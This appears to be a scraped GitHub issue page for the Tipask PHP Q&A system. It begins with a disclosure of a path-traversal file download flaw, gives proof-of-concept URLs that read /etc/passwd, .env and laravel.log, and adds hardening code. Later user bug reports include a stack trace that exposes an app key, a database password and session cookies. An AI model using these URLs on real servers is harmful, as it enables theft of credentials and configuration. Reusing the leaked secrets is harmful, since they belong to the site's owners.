sdfsky / tipask
Tipask is an open-source PHP Q&A system built on the Laravel framework. It is easy to extend and offers strong load capacity and stability.
Home Page: http://www.tipask.com
3.5.9, which fails to validate the path parameters entered by the user when downloading attachments: **a registered user can download arbitrary files on the Tipask server**, such as .env, /etc/passwd, laravel.log and so on, causing information leakage.
Qi'An Xin Technology Group, Network Security Department, Product-Security Team
Official Site: https://www.tipask.com/
Github Repo: https://github.com/sdfsky/tipask
Source code can be downloaded at: https://www.tipask.com/release/Tipask_v3.5.8_UTF8_20210620.zip
Tipask ≤ 3.5.8
2021/09/17
Once you've registered and logged in, you can access the following address directly:
For a Linux server, the PoC is as follows:
http://tipask/attach/download/..-..-..-..-..-..-..-etc-hosts
https://tipask/attach/download/..-..-.env
http://tipask/attach/download/..-logs-laravel.log
http://tipask/attach/download/..-..-..-..-..-..-..-etc-passwd
The vulnerability involves 1 file:
app\Http\Controllers\AttachController.php
path traversal due to no param-check.
Here is sensitive information that was downloaded via the vuln.
Of course, the mitigation is easy to apply: use basename() to process the user's input parameters.
The vendor has CONFIRMED this vulnerability in 2021/09/17, and has patched it via commit 9b5f13; users are able to apply the patch to avoid this vuln.
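The basename() mitigation the report recommends, written out as an added example. This is hypothetical hardening code, not Tipask's AttachController and not the vendor's commit 9b5f13; the storage directory and the function name resolveAttachmentPath are assumptions. basename() on its own strips directory components, but a download handler should also restrict the resulting file name to a conservative character set and canonicalise the final path to confirm it still lies under the attachment directory. The rejected inputs in the self-check include the separator-substituted names from the PoC URLs above:

```php
<?php
// Added example (not Tipask's own code): a hardened attachment path resolver.
// $attachDir and the function name are assumptions for illustration.
declare(strict_types=1);

/**
 * Resolve a user-supplied attachment name to an absolute path inside
 * $attachDir, or return null if the name is not acceptable.
 */
function resolveAttachmentPath(string $attachDir, string $userInput): ?string
{
    // 1. Reduce the input to a bare file name. basename() drops any
    //    directory component, so "../../.env" becomes ".env".
    $name = basename($userInput);

    // 2. Reject empty names, dot-files and anything outside a conservative
    //    character set. Requiring an alphanumeric first character also
    //    rejects names such as "..-..-.env", where the PoC URLs above use
    //    "-" in the positions where "/" would normally appear.
    if ($name === '' || $name[0] === '.'
        || !preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]*$/', $name)) {
        return null;
    }

    // 3. Canonicalise both sides and confirm the target is still inside the
    //    storage directory; this also covers symlinks placed in that directory.
    $base = realpath($attachDir);
    $full = realpath($attachDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

// Self-check against a constructed temporary storage directory.
$dir = sys_get_temp_dir() . '/attach_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . '/report.pdf', 'constructed sample attachment');

$cases = [
    'report.pdf'                      => true,   // legitimate attachment name
    '../../.env'                      => false,  // classic traversal
    '..-..-.env'                      => false,  // separator-substituted form from the PoC
    '..-..-..-..-..-..-..-etc-passwd' => false,
    '.env'                            => false,  // dot-file
    'missing.pdf'                     => false,  // well-formed name, file not present
];
foreach ($cases as $input => $expectAllowed) {
    $resolved = resolveAttachmentPath($dir, $input);
    $asExpected = ($resolved !== null) === $expectAllowed;
    printf("%-34s => %s%s\n", $input,
        $resolved === null ? 'rejected' : 'allowed',
        $asExpected ? '' : ' (UNEXPECTED)');
}

unlink($dir . '/report.pdf');
rmdir($dir);
```

The realpath() comparison is the check that matters most: it is evaluated after every transformation the name has gone through, so it holds even if a later change to the name-cleaning step lets something unexpected through.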
As the title says, I did not see an entry for this setting in the admin backend.
Version: latest
commit f4752c5
Error page:
admin/setting/email
Error summary:
Whoops, looks like something went wrong.
ErrorException in Setting.php line 45:
Array to string conversion
Error stack:
in Setting.php line 45
at HandleExceptions->handleError('8', 'Array to string conversion', '/var/www/html/app/Models/Setting.php', '45', array('env_path' => '/var/www/html/.env', 'env_content' => 'APP_DEBUG=true APP_ENV=local APP_KEY=mnbl2zciiMg9qjFDaDzLAKIFUT2MR5Gv CONTENT_LENGTH=303 CONTENT_TYPE=application/x-www-form-urlencoded DB_DATABASE=tipaskx DB_HOST=db DB_PASSWORD=password1 DB_PORT=3306 DB_PREFIX=ask_ DB_USER=tipaskdb DB_USERNAME=tipaskdb DEVEL_KIT_MODULE_VERSION=0.3.0 DOCUMENT_ROOT=/var/www/html/public DOCUMENT_URI=/index.php FCGI_ROLE=RESPONDER GATEWAY_INTERFACE=CGI/1.1 GPG_KEYS=CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D HOME=/var/cache/nginx HOSTNAME=f4581309a5d8 HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_ACCEPT_LANGUAGE=zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7 HTTP_CACHE_CONTROL=max-age=0 HTTP_CONNECTION=keep-alive HTTP_CONTENT_LENGTH=303 HTTP_CONTENT_TYPE=application/x-www-form-urlencoded HTTP_COOKIE=bmd__Session=72dbf41355aa22cda0b676c9b7932d6c; UM_distinctid=16c897725106d4-09e4718f94c8ff-37c153e-144000-16c89772511b71; CNZZDATA1273638993=1321489185-1565669051-http%253A%252F%252F192.168.106.128%253A8080%252F%7C1565674454; bmd__user_login=2LL7Xn6FE1RhNWMKTamIiINQh%2FZgEFDXjcRtXtlLA%2BSHspsToZBFESNeTqfRuTzE%2B%2BrbpjKBsqGlOxs9zfFFkIPZBS95Ttm8uJQpcoZdwllYizB5Y2Sag0TUzKlrvyUq; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6InlLSkhRaUlmaWFtdEN4MlJUMmJtMlE9PSIsInZhbHVlIjoiK0J0SWtzSkJ3SDBtSEc0UkZcLzQzMTVpdTMzcFpUajZjQjdZYVhKYXRXWnE3UzlWQXdmSVRQamJOTXJsY1dZVDBFSTU4OFwvZlJYZzJyYWt6VHM4NHdIOUJ2b2p4ZE9PRHExXC9USktIeFc3Tm89IiwibWFjIjoiZjc0MjFhOTZhZjNjNThjNTIxYjRiZDYxYmY3MGNiNGUzMzhmNzY1YTBkYmM3Y2Q5YTdlOGJmNzQwZDM2ZjFhZSJ9; 
XSRF-TOKEN=eyJpdiI6IjRES2lEOEJUT2NURmRrMzI4RlI4U3c9PSIsInZhbHVlIjoiVkZPdGxnbFpodnNcL212MUFHSm5wcllFVzZJOVhGUnVaVVwvR3JsaCthcm51XC9UNFNjUk83dlJiUEJZdXQ2dFwveGpMck5uYlMrTWRrWThqQTN0TXdQMUJnPT0iLCJtYWMiOiIzZThjMDc5YTVlYmQwMzEzODlhNTQ4OTg5ZWQ4N2E2YTdiZjA2MGI5ZDc1ZTAyYThkMmU1MDY5NTMyYTlhMTA0In0%3D; laravel_session=eyJpdiI6IjUwdlArN2t2ZTN6QUlUUVhxcXBaeGc9PSIsInZhbHVlIjoiZFc1dDVISWpHUnZ4VjhCeHJ2NkU4ZlNpMkh2aXh6VHJjTXdVR0FzbU5yN3JPaEwwMzk4cXFoSjl3WXlHTStxb2NMNUZ1WmIxeW5QYm5EckJGTFhESGc9PSIsIm1hYyI6ImYzMzAxZGMzM2YxZWM0YzM3OWU0YmYyYjBiYmVhZTU1MjRiMzIxOTAxNWZiZmI0OTUzNjViYzc3MDI0OWY5ZDMifQ%3D%3D HTTP_HOST=192.168.106.128:8008 HTTP_ORIGIN=http://192.168.106.128:8008 HTTP_REFERER=http://192.168.106.128:8008/admin/setting/email HTTP_UPGRADE_INSECURE_REQUESTS=1 HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 LD_PRELOAD=/usr/lib/preloadable_libiconv.so php LUAJIT_INC=/usr/include/luajit-2.1 LUAJIT_LIB=/usr/lib LUA_MODULE_VERSION=0.10.14 MAIL_DRIVER=smtp MAIL_ENCRYPTION=ssl MAIL_FROM_ADDRESS=[email protected] MAIL_FROM_NAME=qiniu MAIL_HOST=smtp.163.com MAIL_OPEN=0 MAIL_PASSWORD=xxxxx! 
MAIL_PORT=465 MAIL_SENDMAIL=/usr/sbin/sendmail -bs MAIL_USERNAME=[email protected] NGINX_VERSION=1.16.0 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c PHP_ASC_URL=https://www.php.net/get/php-7.3.8.tar.xz.asc/from/this/mirror PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi PHP_INI_DIR=/usr/local/etc/php PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie PHP_MD5= PHP_SELF=/index.php PHP_SHA256=f6046b2ae625d8c04310bda0737ac660dc5563a8e04e8a46c1ee24ea414ad5a5 PHP_URL=https://www.php.net/get/php-7.3.8.tar.xz/from/this/mirror PHP_VERSION=7.3.8 PWD=/var/www/html QUERY_STRING= REDIRECT_STATUS=200 REMOTE_ADDR=192.168.106.1 REMOTE_PORT=59545 REQUEST_METHOD=POST REQUEST_SCHEME=http REQUEST_TIME=1566270938 REQUEST_TIME_FLOAT=1566270938.8701 REQUEST_URI=/admin/setting/email SCRIPT_FILENAME=/var/www/html/public/index.php SCRIPT_NAME=/index.php SERVER_ADDR=172.29.0.4 SERVER_NAME=_ SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=nginx/1.16.0 SHLVL=1 SUPERVISOR_ENABLED=1 SUPERVISOR_GROUP_NAME=php-fpm SUPERVISOR_PROCESS_NAME=php-fpm SUPERVISOR_SERVER_URL=unix:///dev/shm/supervisor.sock USER=nginx argc=0 ', 'value' => array(), 'key' => 'argv')) in Setting.php line 45
at Setting::writeToEnv() in SettingController.php line 67
at SettingController->email(object(Request))
at call_user_func_array(array(object(SettingController), 'email'), array(object(Request))) in Controller.php line 256
at Controller->callAction('email', array(object(Request))) in ControllerDispatcher.php line 164
at ControllerDispatcher->call(object(SettingController), object(Route), 'email') in ControllerDispatcher.php line 112
at ControllerDispatcher->Illuminate\Routing{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 139
at Pipeline->Illuminate\Pipeline{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 102
at Pipeline->then(object(Closure)) in ControllerDispatcher.php line 114
at ControllerDispatcher->callWithinStack(object(SettingController), object(Route), object(Request), 'email') in ControllerDispatcher.php line 68
at ControllerDispatcher->dispatch(object(Route), object(Request), 'App\Http\Controllers\Admin\SettingController', 'email') in Route.php line 203
at Route->runWithCustomDispatcher(object(Request)) in Route.php line 134
at Route->run(object(Request)) in Router.php line 708
at Router->Illuminate\Routing{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 139
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in AdminAuthenticate.php line 26
at AdminAuthenticate->handle(object(Request), object(Closure))
at call_user_func_array(array(object(AdminAuthenticate), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in Authenticate.php line 44
at Authenticate->handle(object(Request), object(Closure))
at call_user_func_array(array(object(Authenticate), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 102
at Pipeline->then(object(Closure)) in Router.php line 710
at Router->runRouteWithinStack(object(Route), object(Request)) in Router.php line 674
at Router->dispatchToRoute(object(Request)) in Router.php line 635
at Router->dispatch(object(Request)) in Kernel.php line 236
at Kernel->Illuminate\Foundation\Http{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 139
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in VerifyCsrfToken.php line 50
at VerifyCsrfToken->handle(object(Request), object(Closure))
at call_user_func_array(array(object(VerifyCsrfToken), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in ShareErrorsFromSession.php line 49
at ShareErrorsFromSession->handle(object(Request), object(Closure))
at call_user_func_array(array(object(ShareErrorsFromSession), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in StartSession.php line 62
at StartSession->handle(object(Request), object(Closure))
at call_user_func_array(array(object(StartSession), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in AddQueuedCookiesToResponse.php line 37
at AddQueuedCookiesToResponse->handle(object(Request), object(Closure))
at call_user_func_array(array(object(AddQueuedCookiesToResponse), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in EncryptCookies.php line 59
at EncryptCookies->handle(object(Request), object(Closure))
at call_user_func_array(array(object(EncryptCookies), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in CheckForMaintenanceMode.php line 44
at CheckForMaintenanceMode->handle(object(Request), object(Closure))
at call_user_func_array(array(object(CheckForMaintenanceMode), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 102
at Pipeline->then(object(Closure)) in Kernel.php line 122
at Kernel->sendRequestThroughRouter(object(Request)) in Kernel.php line 87
at Kernel->handle(object(Request)) in index.php line 53
Steps to reproduce:
After filling in the mailbox settings, click Save.
Referring to PR #5, I personally suggest keeping all imported third-party libraries together under the /public/static/libs directory, for example:
Importing cropper from https://github.com/fengyuanchen/cropper
The Cropper image cropping library consists of two files:
CSS: cropper.min.css
JS: cropper.min.js
Create a cropper directory under /public/static/libs, put the two files (cropper.min.css and cropper.min.js) into that cropper directory, and then import each of them
CSS import
The benefit of this is that it avoids
CSS files appearing in the /public/static/js directory
JS files appearing in the /public/static/css directory
Suggest adding batch tag generation
The dependency file URLs in composer.lock are no longer valid, so composer install reports "download failed" for packages.
Error at the last installation step
SQLSTATE[HY000] [1044] Access denied for user ''@'localhost' to database 'forge' (SQL: select * from `ask_settings` where (`name` = website_name) limit 1) in Connection.php line 664
at Connection->runQueryCallback('select * from `ask_settings` where (`name` = ?) limit 1', array('website_name'), object(Closure)) in Connection.php line 624
at Connection->run('select * from `ask_settings` where (`name` = ?) limit 1', array('website_name'), object(Closure)) in Connection.php line 333
at Connection->select('select * from `ask_settings` where (`name` = ?) limit 1', array('website_name'), true) in Builder.php line 1963
at Builder->runSelect() in Builder.php line 1951
at Builder->Illuminate\Database\Query{closure}() in Builder.php line 2435
at Builder->onceWithColumns(array(''), object(Closure)) in Builder.php line 1952
at Builder->get(array('')) in Builder.php line 481
at Builder->getModels(array('')) in Builder.php line 465
at Builder->get(array('')) in BuildsQueries.php line 77
at Builder->first() in Builder.php line 361
at Builder->firstOrNew(array('name' => 'website_name')) in Builder.php line 395
I am using the BaoTa (宝塔) panel with PHP 7.2 and followed the official video installation tutorial step by step, but the last step just does not succeed. I am out of ideas; how can this be solved? Thanks
Also, what is this 'forge' table in database 'forge' used for?
Complete separation of frontend and backend, with JSON API support!!
The latest 3.5.5 version installs fine, but an error occurs when posting an article: a 500 internal error on store
There is no install folder or install.php file under public. How do I install?
This is a Prepare Issue for a Pull Request
Improvements to optimize file storage (avatars, attachments)
Strongly suggest adding the wangEditor editor
[2021-06-28 22:19:54] local.ERROR: Argument 1 passed to str_contains() must be of the type string, null given, called in /var/www/html/QA/app/Models/Setting.php on line 56 {"exception":"[object] (Symfony\Component\Debug\Exception\FatalThrowableError(code: 0): Argument 1 passed to str_contains() must be of the type string, null given, called in /var/www/html/QA/app/Models/Setting.php on line 56 at /var/www/html/QA/vendor/symfony/polyfill-php80/bootstrap.php:29)
[stacktrace]
#0 /var/www/html/QA/app/Models/Setting.php(56): str_contains(NULL, ' ')
I could not find any installation or deployment instructions?
Version: tipask 3.3 (3.2 behaves the same)
Environment: Ubuntu 16.04 + Nginx 1.12.2 + php7.2.5
Problem description: after the user's email address has been verified successfully, the frontend email settings page still shows: "You have not bound an email address yet; once bound, you can log in to the system with your email address."
$paymentChart was removed earlier in the code, but the later code that uses it was not removed, which causes an error on the admin home page.
return view("admin.index.index")->with(compact('totalUserNum','totalQuestionNum','totalArticleNum','totalAnswerNum','userChart','questionChart','systemInfo','paymentChart'));
Go all the way and upgrade the framework to Laravel 6